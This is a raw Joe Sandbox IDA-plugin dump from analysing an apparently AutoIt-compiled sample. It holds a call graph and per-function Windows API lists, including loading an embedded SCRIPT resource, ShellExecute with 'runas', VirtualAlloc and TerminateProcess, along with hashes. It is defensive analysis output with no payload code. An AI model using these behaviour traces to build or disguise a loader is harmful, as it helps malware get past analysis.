96620->96636 96656 758cd3 96620->96656 96622 75844f 96697 758ee4 60 API calls 96622->96697 96625 75845e 96627 75828f 96625->96627 96628 75846a 96625->96628 96626 758049 96629 6d7510 53 API calls 96626->96629 96626->96636 96643 758281 96626->96643 96688 73417d 22 API calls __fread_nolock 96626->96688 96689 75851d 42 API calls _strftime 96626->96689 96669 757e86 96627->96669 96628->96636 96629->96626 96634 7582c8 96684 6efc70 96634->96684 96636->96195 96638 758302 96691 6d63eb 22 API calls 96638->96691 96639 7582e8 96690 74359c 82 API calls __wsopen_s 96639->96690 96642 7582f3 GetCurrentProcess TerminateProcess 96642->96638 96643->96622 96643->96627 96644 758311 96692 6d6a50 22 API calls 96644->96692 96646 75832a 96654 758352 96646->96654 96693 6e04f0 22 API calls 96646->96693 96647 7584c5 96647->96636 96651 7584d9 FreeLibrary 96647->96651 96649 758341 96694 758b7b 75 API calls 96649->96694 96651->96636 96654->96647 96695 6e04f0 22 API calls 96654->96695 96696 6daceb 23 API calls ISource 96654->96696 96698 758b7b 75 API calls 96654->96698 96657 6daec9 22 API calls 96656->96657 96658 758cee CharLowerBuffW 96657->96658 96699 738e54 96658->96699 96662 6da961 22 API calls 96663 758d2a 96662->96663 96664 6d6d25 22 API calls 96663->96664 96665 758d3e 96664->96665 96666 6d93b2 22 API calls 96665->96666 96668 758d48 _wcslen 96666->96668 96667 758e5e _wcslen 96667->96626 96668->96667 96706 75851d 42 API calls _strftime 96668->96706 96670 757ea1 96669->96670 96674 757eec 96669->96674 96671 6efe0b 22 API calls 96670->96671 96672 757ec3 96671->96672 96673 6efddb 22 API calls 96672->96673 96672->96674 96673->96672 96675 759096 96674->96675 96676 7592ab ISource 96675->96676 96683 7590ba _strcat _wcslen 96675->96683 96676->96634 96677 6db567 39 API calls 96677->96683 96678 6db38f 39 API calls 96678->96683 96679 6db6b5 39 API calls 96679->96683 96680 6d7510 53 API calls 96680->96683 96681 6fea0c 21 API calls ___std_exception_copy 96681->96683 96683->96676 96683->96677 96683->96678 
96683->96679 96683->96680 96683->96681 96709 73efae 24 API calls _wcslen 96683->96709 96685 6efc85 96684->96685 96686 6efd1d VirtualAlloc 96685->96686 96687 6efceb 96685->96687 96686->96687 96687->96638 96687->96639 96688->96626 96689->96626 96690->96642 96691->96644 96692->96646 96693->96649 96694->96654 96695->96654 96696->96654 96697->96625 96698->96654 96700 738e74 _wcslen 96699->96700 96701 738f63 96700->96701 96704 738ea9 96700->96704 96705 738f68 96700->96705 96701->96662 96701->96668 96704->96701 96707 6ece60 41 API calls 96704->96707 96705->96701 96708 6ece60 41 API calls 96705->96708 96706->96667 96707->96704 96708->96705 96709->96683 96738 6d6270 96710->96738 96712 6d9fd2 96713 6da4a1 22 API calls 96712->96713 96714 6d9fec 96713->96714 96714->96200 96717 71f7c4 96748 7396e2 84 API calls __wsopen_s 96717->96748 96718 71f699 96726 6efddb 22 API calls 96718->96726 96720 6da405 96720->96714 96749 7396e2 84 API calls __wsopen_s 96720->96749 96721 6da4a1 22 API calls 96737 6d9eb5 96721->96737 96724 6da6c3 22 API calls 96724->96737 96725 71f7d2 96727 6da4a1 22 API calls 96725->96727 96728 71f754 96726->96728 96729 71f7e8 96727->96729 96730 6efe0b 22 API calls 96728->96730 96729->96714 96731 6da12c __fread_nolock 96730->96731 96731->96717 96731->96720 96733 6da587 22 API calls 96733->96737 96734 6daec9 22 API calls 96735 6da0db CharUpperBuffW 96734->96735 96744 6da673 22 API calls 96735->96744 96737->96712 96737->96717 96737->96718 96737->96720 96737->96721 96737->96724 96737->96731 96737->96733 96737->96734 96743 6d4573 41 API calls _wcslen 96737->96743 96745 6d48c8 23 API calls 96737->96745 96746 6d49bd 22 API calls __fread_nolock 96737->96746 96747 6da673 22 API calls 96737->96747 96739 6efe0b 22 API calls 96738->96739 96740 6d6295 96739->96740 96741 6efddb 22 API calls 96740->96741 96742 6d62a3 96741->96742 96742->96737 96743->96737 96744->96737 96745->96737 96746->96737 96747->96737 96748->96725 96749->96714 96751 73d4d5 96750->96751 96752 73dbdc 

              Control-flow Graph

              APIs
              • GetVersionExW.KERNEL32(?), ref: 006D430D
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • GetCurrentProcess.KERNEL32(?,0076CB64,00000000,?,?), ref: 006D4422
              • IsWow64Process.KERNEL32(00000000,?,?), ref: 006D4429
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006D4454
              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006D4466
              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006D4474
              • FreeLibrary.KERNEL32(00000000,?,?), ref: 006D447B
              • GetSystemInfo.KERNEL32(?,?,?), ref: 006D44A0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
              • String ID: GetNativeSystemInfo$kernel32.dll$|O
              • API String ID: 3290436268-3101561225
              • Opcode ID: 5e58d419d6dfeb18fa973428e244d21e4e5ef5a0b52b42e5afb7f7e9ab991676
              • Instruction ID: 569a3738feeeae290c9a7606aa7d775ee12e45a2e80a7a97d16c6f5d36e87631
              • Opcode Fuzzy Hash: 5e58d419d6dfeb18fa973428e244d21e4e5ef5a0b52b42e5afb7f7e9ab991676
              • Instruction Fuzzy Hash: 1AA1A465D0A2C0DFEF12CF6D78801E57FE5ABA7340F88C89AD08197B61D67C4949CB29

              Control-flow Graph

              APIs
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006D50AA,?,?,00000000,00000000), ref: 006D42B2
              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006D50AA,?,?,00000000,00000000), ref: 006D42C9
              • LoadResource.KERNEL32(?,00000000,?,?,006D50AA,?,?,00000000,00000000,?,?,?,?,?,?,006D4F20), ref: 007135BE
              • SizeofResource.KERNEL32(?,00000000,?,?,006D50AA,?,?,00000000,00000000,?,?,?,?,?,?,006D4F20), ref: 007135D3
              • LockResource.KERNEL32(006D50AA,?,?,006D50AA,?,?,00000000,00000000,?,?,?,?,?,?,006D4F20,?), ref: 007135E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
              • String ID: SCRIPT
              • API String ID: 3051347437-3967369404
              • Opcode ID: 246a075dd664262b1961dfb6f7a89e26ad9afcf8139f8b6a19e43dc05d42bf46
              • Instruction ID: 8f7659fde18478b6f866f0df50208c0ada4bf0b7bd2b3275a48622568657523e
              • Opcode Fuzzy Hash: 246a075dd664262b1961dfb6f7a89e26ad9afcf8139f8b6a19e43dc05d42bf46
              • Instruction Fuzzy Hash: BB117C70600701BFE7228B65DC49F677BBAEFC5B51F10816AF847D6290DBB1DD008660

              Control-flow Graph

              APIs
              • SetCurrentDirectoryW.KERNEL32(?), ref: 006D2B6B
                • Part of subcall function 006D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007A1418,?,006D2E7F,?,?,?,00000000), ref: 006D3A78
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • GetForegroundWindow.USER32(runas,?,?,?,?,?,00792224), ref: 00712C10
              • ShellExecuteW.SHELL32(00000000,?,?,00792224), ref: 00712C17
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
              • String ID: runas
              • API String ID: 448630720-4000483414
              • Opcode ID: 0ae78c4a52aae88b647397d5948f97223b6ab1779edddb5b18a84e4de8879300
              • Instruction ID: d643540db0769af3fb9bac1b6c5997cb7f89ac590afa182eb39c11fd9de8d72d
              • Opcode Fuzzy Hash: 0ae78c4a52aae88b647397d5948f97223b6ab1779edddb5b18a84e4de8879300
              • Instruction Fuzzy Hash: 28112C31E083915AD755FF64D8519BE7BA69FE5744F44442FF082023A3CF68894AC71B
              APIs
              • lstrlenW.KERNEL32(?,00715222), ref: 0073DBCE
              • GetFileAttributesW.KERNELBASE(?), ref: 0073DBDD
              • FindFirstFileW.KERNELBASE(?,?), ref: 0073DBEE
              • FindClose.KERNEL32(00000000), ref: 0073DBFA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileFind$AttributesCloseFirstlstrlen
              • String ID:
              • API String ID: 2695905019-0
              • Opcode ID: 72eac06d1bf322ed8667c13715d8a6a76d7f68eff1fb54395183526af14965d0
              • Instruction ID: 643c8daf687ae83e39368bfd93b56a5a334912e88e81bdc431b8eb0b8de2b057
              • Opcode Fuzzy Hash: 72eac06d1bf322ed8667c13715d8a6a76d7f68eff1fb54395183526af14965d0
              • Instruction Fuzzy Hash: BFF0A7704206145FA2316B78AC0D47A776CAE01334F108702F876C10E1EBF89D5485AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BuffCharUpper
              • String ID: p#z
              • API String ID: 3964851224-2781437441
              • Opcode ID: 5b24d06816cc9a8575612682a5decfa7c6b3d09c46638de714a013fa82d865f2
              • Instruction ID: 8bf7a7f724639f46705f99f24b0665224643b1b2148bf040f0109dbad4b50b56
              • Opcode Fuzzy Hash: 5b24d06816cc9a8575612682a5decfa7c6b3d09c46638de714a013fa82d865f2
              • Instruction Fuzzy Hash: 0FA27D70A08355DFD710CF18C480B6ABBE2BF89314F14896EE89A9B352D775EC45CB92
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InputSleepStateTimetime
              • String ID:
              • API String ID: 4149333218-0
              • Opcode ID: 6b5ee86505a2915c55a1435c95bac68bb8339daaf7b59038d5ac592e4d4312cf
              • Instruction ID: 5a069a0b059f65590e8d978a29e9aa72318cd83de11aca0ebc9c769064dfa5ce
              • Opcode Fuzzy Hash: 6b5ee86505a2915c55a1435c95bac68bb8339daaf7b59038d5ac592e4d4312cf
              • Instruction Fuzzy Hash: EB423670A04341EFD725EF24C844BAAB7E2BF86304F14851EF8568B392D779E845CB92

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 006D2D07
              • RegisterClassExW.USER32(00000030), ref: 006D2D31
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006D2D42
              • InitCommonControlsEx.COMCTL32(?), ref: 006D2D5F
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006D2D6F
              • LoadIconW.USER32(000000A9), ref: 006D2D85
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006D2D94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: abf4921485fad8f7decfba4dde7d85d2729b00000cda5d9487c7e036090d72f4
              • Instruction ID: d41e656721f8152c92dd79ceb61baa6bd4ecab2fdab06af11c530d46052495e0
              • Opcode Fuzzy Hash: abf4921485fad8f7decfba4dde7d85d2729b00000cda5d9487c7e036090d72f4
              • Instruction Fuzzy Hash: 712127B0901358AFEB01DFA4EC48BEEBBB4FB48700F00811AF552A62A0D7B91544CF99

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: .o
              • API String ID: 0-1957372423
              • Opcode ID: a2d2d4247ac27b2bcf4d84df3ef3fe38d0109192b34bf9c5af5081b4b5290163
              • Instruction ID: 828c8c3f5b6c32db5ec654f076e1baca557b93afdc6cd4675d5c4b882d78edf1
              • Opcode Fuzzy Hash: a2d2d4247ac27b2bcf4d84df3ef3fe38d0109192b34bf9c5af5081b4b5290163
              • Instruction Fuzzy Hash: E3C1F174A0424AEFDB51DFA8C844BADBBF1AF49310F044299F654AB3D3C7389941CB61

              Control-flow Graph

              APIs
                • Part of subcall function 0071039A: CreateFileW.KERNELBASE(00000000,00000000,?,00710704,?,?,00000000,?,00710704,00000000,0000000C), ref: 007103B7
              • GetLastError.KERNEL32 ref: 0071076F
              • __dosmaperr.LIBCMT ref: 00710776
              • GetFileType.KERNELBASE(00000000), ref: 00710782
              • GetLastError.KERNEL32 ref: 0071078C
              • __dosmaperr.LIBCMT ref: 00710795
              • CloseHandle.KERNEL32(00000000), ref: 007107B5
              • CloseHandle.KERNEL32(?), ref: 007108FF
              • GetLastError.KERNEL32 ref: 00710931
              • __dosmaperr.LIBCMT ref: 00710938
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 3d7b2947b5edf9c0b645642d35edd098d24897b8e53abf504cab54786642d6e1
              • Instruction ID: de18356d564fffede57596023328c43ca7459cb933514b6fe10b67b89811eae9
              • Opcode Fuzzy Hash: 3d7b2947b5edf9c0b645642d35edd098d24897b8e53abf504cab54786642d6e1
              • Instruction Fuzzy Hash: 17A14332A001088FDF19AF6CD895BEE3BA1AF46320F14415DF811AB3D1C7799992CBD5

              Control-flow Graph

              APIs
                • Part of subcall function 006D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007A1418,?,006D2E7F,?,?,?,00000000), ref: 006D3A78
                • Part of subcall function 006D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006D3379
              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006D356A
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0071318D
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007131CE
              • RegCloseKey.ADVAPI32(?), ref: 00713210
              • _wcslen.LIBCMT ref: 00713277
              • _wcslen.LIBCMT ref: 00713286
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
              • API String ID: 98802146-2727554177
              • Opcode ID: 4791c3cb5fc6fbc689d9389b15f960770e75618001c1425df07a554156c7de44
              • Instruction ID: dc0eb2053d3abf49d6fd92b1ba64864e9878e76d5ca4e9013eeafbc660286080
              • Opcode Fuzzy Hash: 4791c3cb5fc6fbc689d9389b15f960770e75618001c1425df07a554156c7de44
              • Instruction Fuzzy Hash: A571B6715043009FC744EF69DC418ABBBE8FF86740F40842EF545872B1EB789A49CB59

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 006D2B8E
              • LoadCursorW.USER32(00000000,00007F00), ref: 006D2B9D
              • LoadIconW.USER32(00000063), ref: 006D2BB3
              • LoadIconW.USER32(000000A4), ref: 006D2BC5
              • LoadIconW.USER32(000000A2), ref: 006D2BD7
              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006D2BEF
              • RegisterClassExW.USER32(?), ref: 006D2C40
                • Part of subcall function 006D2CD4: GetSysColorBrush.USER32(0000000F), ref: 006D2D07
                • Part of subcall function 006D2CD4: RegisterClassExW.USER32(00000030), ref: 006D2D31
                • Part of subcall function 006D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006D2D42
                • Part of subcall function 006D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 006D2D5F
                • Part of subcall function 006D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006D2D6F
                • Part of subcall function 006D2CD4: LoadIconW.USER32(000000A9), ref: 006D2D85
                • Part of subcall function 006D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006D2D94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
              • String ID: #$0$AutoIt v3
              • API String ID: 423443420-4155596026
              • Opcode ID: f6d9fe7856e3c8a7354fb36c54262a62cdc0eea2523d96967e22a9d9ffcae6af
              • Instruction ID: 7553c93a847984972d24c8f2b4edff7a2396c84a6737d1a18b6c23467bec22d9
              • Opcode Fuzzy Hash: f6d9fe7856e3c8a7354fb36c54262a62cdc0eea2523d96967e22a9d9ffcae6af
              • Instruction Fuzzy Hash: A7213874E00328AFEF119FA5EC55AA97FF4FB89B50F40802AE505A66A0D3B90540CF98
              APIs
              • __Init_thread_footer.LIBCMT ref: 006DBB4E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: p#z$p#z$p#z$p#z$p%z$p%z$x#z$x#z
              • API String ID: 1385522511-1284704788
              • Opcode ID: 4ec2818770f85ea7b984ab4cb3980e279c943042b8b502cb815c5ef230b3dab9
              • Instruction ID: 721285d8659759c0c7bd81cec89dafe187ed59db21ee90547f6f82226ab269af
              • Opcode Fuzzy Hash: 4ec2818770f85ea7b984ab4cb3980e279c943042b8b502cb815c5ef230b3dab9
              • Instruction Fuzzy Hash: 1C329D34E00219DFDB14CF58C894ABEB7B6FF46310F16805AE915AB356C778AD42CBA1

              Control-flow Graph

              APIs
              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006D316A,?,?), ref: 006D31D8
              • KillTimer.USER32(?,00000001,?,?,?,?,?,006D316A,?,?), ref: 006D3204
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006D3227
              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006D316A,?,?), ref: 006D3232
              • CreatePopupMenu.USER32 ref: 006D3246
              • PostQuitMessage.USER32(00000000), ref: 006D3267
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
              • String ID: TaskbarCreated
              • API String ID: 129472671-2362178303
              • Opcode ID: cd151b0d83ca9ac18536566dfafa0400343550417e7bb65e33de03ee1d050927
              • Instruction ID: 317a016b31a23cfbf3fec66c0101b0bc463eafdfe01ad8dcbd26cf9c7b3828b7
              • Opcode Fuzzy Hash: cd151b0d83ca9ac18536566dfafa0400343550417e7bb65e33de03ee1d050927
              • Instruction Fuzzy Hash: A2414C35E00261A7EF151F789C0D7B9361BE786340F048127F542853E2C7AE9B4197AB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: D%z$D%z$D%z$D%z$D%zD%z$Variable must be of type 'Object'.
              • API String ID: 0-1874280672
              • Opcode ID: 8303d12e2cc865d3599008438d0a4f61e74f7a9edb887e8c2f2ecbd9080d5590
              • Instruction ID: 1b46072e2f65bd35412a9813bf7e5d9bcaff1260729c27f0cccc1bcf8af2f3bc
              • Opcode Fuzzy Hash: 8303d12e2cc865d3599008438d0a4f61e74f7a9edb887e8c2f2ecbd9080d5590
              • Instruction Fuzzy Hash: 43C28F71E00215CFCB24EF58D880AADB7B2BF49310F24855AE915AF351D37AED42CB95
              APIs
              • __Init_thread_footer.LIBCMT ref: 006DFE66
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: D%z$D%z$D%z$D%z$D%zD%z
              • API String ID: 1385522511-3500222704
